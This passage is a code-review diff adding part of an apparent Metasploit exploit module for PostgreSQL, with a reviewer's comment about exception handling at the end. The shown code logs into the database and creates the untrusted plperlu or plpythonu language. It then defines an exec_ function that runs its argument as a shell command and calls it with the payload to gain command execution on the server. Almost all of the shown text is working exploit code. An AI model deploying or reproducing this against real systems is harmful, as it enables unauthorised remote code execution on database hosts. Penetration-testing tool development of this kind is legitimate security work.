modules/exploits/multi/postgres/postgres_createlang.rb

```diff
@@ -0,0 +1,258 @@
+        # "NoMethodError undefined method `+' for nil:NilClass"
+        # But the exploit and payload work just fine. I'm open to suggestions on why and how to fix - @micheal
+        select_query = postgres_query("SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')")
+
+        case select_query.keys[0]
+          when :conn_error
+            print_error "#{rhost}:#{rport} - Connection error"
+
+          when :sql_error
+            print_error "#{rhost}:#{rport} - Exploit failed"
+            return false
+
+          when :complete
+            print_good "#{rhost}:#{rport} - Exploit successful"
+        end
+
+      else
+        print_error "#{rhost}:#{rport} - Exploit failed"
+        return false
+      end
+
+    rescue RuntimeError => e
+      print_error "#{rhost}:#{rport} - Failed to create UDF: #{e.class}: #{e}"
+    end
+
+    postgres_logout if @postgres_conn
+  end
+
+  def create_function(language, func_name)
+    load_func = ''
+
+    case language
+      when 'perl'
+        load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" \
+        "`$_[0]`;" \
+        "$$ LANGUAGE pl#{language}u")
+
+      when /^python(?:2|3)?/i
+        load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \
+        "import subprocess, shlex\r" \
+        "subprocess.check_output(shlex.split(c))\r" \
+        "$$ LANGUAGE pl#{language}u")
+    end
+
+    case load_func.keys[0]
+      when :conn_error
+        print_error "#{rhost}:#{rport} - Connection error"
+
+      when :sql_error
+        print_error "#{rhost}:#{rport} Exploit failed"
+        return false
+
+      when :complete
+        print_good "#{rhost}:#{rport} - Loaded UDF (exec_#{func_name})"
+      end
+  end
+
+  def create_language(language, extension)
+    load_language = postgres_query("CREATE #{extension} pl#{language}u")
+
+    if load_language.keys[0] == :sql_error
+
+      match_exists = load_language[:sql_error].match(/(?:(extension|language) "pl#{language}u" already exists)/m)
+
+      if match_exists
+        return :exists
+
+      else
+        match_error = load_language[:sql_error].match(/(?:could not (?:open extension control|access) file|unsupported language)/m)
+
+        if match_error
+          return :not_exists
+        end
+      end
+
+    else
+      return :loaded
+    end
+  end
+
+  # Authenticate to the postgres server.
+  # Returns the version from #postgres_fingerprint
+  def do_login(user, pass, database)
+    begin
+      password = pass || postgres_password
+
+      result = postgres_fingerprint(
+        db: database,
+        username: user,
+        password: password
+      )
+
+      if result[:auth]
+        return result[:auth]
+
+      else
+        print_status "#{rhost}:#{rport} - Login failed"
+        return :noauth
+      end
+
+    rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError
```

Comment:
Is `Rex::Post::Meterpreter::RequestError` actually thrown from anything above?  That seems a little weird.